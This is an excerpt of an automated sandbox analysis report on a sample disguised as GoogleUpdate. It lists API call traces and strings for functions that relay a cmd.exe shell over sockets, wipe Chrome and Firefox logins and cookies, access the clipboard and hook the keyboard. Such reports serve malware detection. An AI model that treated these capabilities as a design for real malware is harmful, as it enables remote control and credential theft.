                                  • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                  • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
                                  • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
                                  • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                  • Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                  • Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                • String ID:
                                • API String ID: 1170566393-0
                                • Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                • Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
                                • Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                • Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD
                                APIs
                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                • Opcode ID: 45ec037ff3f11c3377af06228b41f3649b2aef2a985cc8a2ae7fe0674100b2b5
                                • Instruction ID: 386fdb2549058a8a428fc13e61fc6334607da2f15a29588e2e4b41d188acd0cd
                                • Opcode Fuzzy Hash: 45ec037ff3f11c3377af06228b41f3649b2aef2a985cc8a2ae7fe0674100b2b5
                                • Instruction Fuzzy Hash: D12175729001196BCF04BBA1EC96DEEBB3CFF14314B00413AF905B21E2EA78A905C6A4
                                APIs
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event
                                • String ID:
                                • API String ID: 4201588131-0
                                • Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                • Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                                APIs
                                • CallNextHookEx.USER32(00472008,?,?,?), ref: 0040945A
                                  • Part of subcall function 0040A592: GetKeyState.USER32(00000011), ref: 0040A597
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallHookNextState
                                • String ID:
                                • API String ID: 3280314413-0
                                • Opcode ID: b213533d89f34a8f60d49ea32f91a8c14c5b96264486c69f750ded0ae2646848
                                • Instruction ID: ef3e78a0d56c017aaa0a0c11970866132e74996ba15d005dbfef21be4abb79d1
                                • Opcode Fuzzy Hash: b213533d89f34a8f60d49ea32f91a8c14c5b96264486c69f750ded0ae2646848
                                • Instruction Fuzzy Hash: 49F0F4322083015BCA08BF799C4446F775AEB95318F00447FFA426A2D3CA7ACC1A875B
                                APIs
                                • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000,?,00471E90,00404C29,00000000,00000000,00000000,?,00471E90,?), ref: 00404BBA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: b89ce8ac9f40c7ccd51c1a2e24f7abd116ec708403ee352032a183d8b5ab9f41
                                • Instruction ID: 05df22d7d1b84fe333aabf98f29930b086fa4c9395f38fd5094a2cbf6cf0f4d8
                                • Opcode Fuzzy Hash: b89ce8ac9f40c7ccd51c1a2e24f7abd116ec708403ee352032a183d8b5ab9f41
                                • Instruction Fuzzy Hash: 25F08236108212FFCB016F14EC08E4AFB66FF84721F10862AF510622A187B1FC21DB55
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056C6
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                • __Init_thread_footer.LIBCMT ref: 00405703
                                • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                • CloseHandle.KERNEL32 ref: 00405A03
                                • CloseHandle.KERNEL32 ref: 00405A0B
                                • CloseHandle.KERNEL32 ref: 00405A1D
                                • CloseHandle.KERNEL32 ref: 00405A25
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: SystemDrive$cmd.exe
                                • API String ID: 2994406822-3633465311
                                • Opcode ID: 7a52aa9ece44894e4bbd27c104709daa3ae844b0e5ba1a64520aa67f220059eb
                                • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                • Opcode Fuzzy Hash: 7a52aa9ece44894e4bbd27c104709daa3ae844b0e5ba1a64520aa67f220059eb
                                • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                • FindClose.KERNEL32(00000000), ref: 0040AC53
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: 073fac6c51c1e751163950d4b7c16a7b92d8ae4f100ca626a4fd65d43b926aa3
                                • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                • Opcode Fuzzy Hash: 073fac6c51c1e751163950d4b7c16a7b92d8ae4f100ca626a4fd65d43b926aa3
                                • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                • FindClose.KERNEL32(00000000), ref: 0040AE11
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 0bc79713efeab2056573a716af7b519b91b9c0107f61c6b9dd4d47a89dc72595
                                • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                • Opcode Fuzzy Hash: 0bc79713efeab2056573a716af7b519b91b9c0107f61c6b9dd4d47a89dc72595
                                • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                APIs
                                • OpenClipboard.USER32 ref: 00414EC2
                                • EmptyClipboard.USER32 ref: 00414ED0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID:
                                • API String ID: 3520204547-0
                                • Opcode ID: 8ddb5d8ef78071ab70dae4603bd9b06982325a8b73943224197f534490ef07d5
                                • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                • Opcode Fuzzy Hash: 8ddb5d8ef78071ab70dae4603bd9b06982325a8b73943224197f534490ef07d5
                                • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID: pth_unenc
                                • API String ID: 2341273852-4028850238
                                • Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                • Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                • GetLastError.KERNEL32 ref: 00418771
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: 81e72d1dcc13280ed1879cf9f090714b21071ed40770cb220e29a79454c2b8af
                                • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                • Opcode Fuzzy Hash: 81e72d1dcc13280ed1879cf9f090714b21071ed40770cb220e29a79454c2b8af
                                • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 11542885cda4c16d1920560b98fd398d06e3d747a1d9c41d39899ef57f372abe
                                • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                • Opcode Fuzzy Hash: 11542885cda4c16d1920560b98fd398d06e3d747a1d9c41d39899ef57f372abe
                                • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: fa0de1f175a1557feb00b840cfe6c9673a013f69383183f764d230263201d944
                                • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                • Opcode Fuzzy Hash: fa0de1f175a1557feb00b840cfe6c9673a013f69383183f764d230263201d944
                                • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                • GetLastError.KERNEL32 ref: 0040A999
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                • UserProfile, xrefs: 0040A95F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
                                • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                • Opcode Fuzzy Hash: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
                                • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                • GetLastError.KERNEL32 ref: 00415CDB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408393
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                • FindClose.KERNEL32(00000000), ref: 004086F4
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
